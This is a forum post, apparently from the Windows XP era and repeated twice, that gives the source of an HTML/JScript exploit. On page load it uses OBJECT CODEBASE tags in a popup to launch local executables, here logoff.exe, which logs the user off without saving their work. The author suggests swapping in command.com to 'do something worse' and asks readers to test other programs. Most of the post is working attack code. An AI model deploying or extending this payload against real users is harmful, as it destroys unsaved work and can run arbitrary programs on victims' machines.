Im just going to paste the source and explain what it does,nothing less.
<HTML>
<HEAD>
<SCRIPT language=JScript>
var programName=new Array(
'c:/windows/system32/logoff.exe',
'c:/winxp/system32/logoff.exe',
'c:/winnt/system32/logoff.exe'
);
function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
for(n=0;n<programName.length;n++)
html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
oPopBody.innerHTML=html;
oPopup.show(290, 390, 200, 200, document.body);
}
</SCRIPT>
</head>
<BODY onload="Init()">
You should feel lucky if you dont have XP right now.
</BODY>
</HTML>
Basically this is an HTML file when opened in Windows XP will log you off. Some might say "so" but when you open it, it doesnt ask to save work in progress ect. The other concern is that other may be able to use command lines like command.com ect to do something worse. I've only tested with logoff.exe and sol.exe, anyone else feel free to test with other programs. Lamers please don't put this on a site just to be an idiot, no one wants to loose work thats been in progress for hours/days/weeks/months.
-Cremator
<HTML>
<HEAD>
<SCRIPT language=JScript>
var programName=new Array(
'c:/windows/system32/logoff.exe',
'c:/winxp/system32/logoff.exe',
'c:/winnt/system32/logoff.exe'
);
function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
for(n=0;n<programName.length;n++)
html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
oPopBody.innerHTML=html;
oPopup.show(290, 390, 200, 200, document.body);
}
</SCRIPT>
</head>
<BODY onload="Init()">
You should feel lucky if you dont have XP right now.
</BODY>
</HTML>
Basically this is an HTML file when opened in Windows XP will log you off. Some might say "so" but when you open it, it doesnt ask to save work in progress ect. The other concern is that other may be able to use command lines like command.com ect to do something worse. I've only tested with logoff.exe and sol.exe, anyone else feel free to test with other programs. Lamers please don't put this on a site just to be an idiot, no one wants to loose work thats been in progress for hours/days/weeks/months.
-Cremator
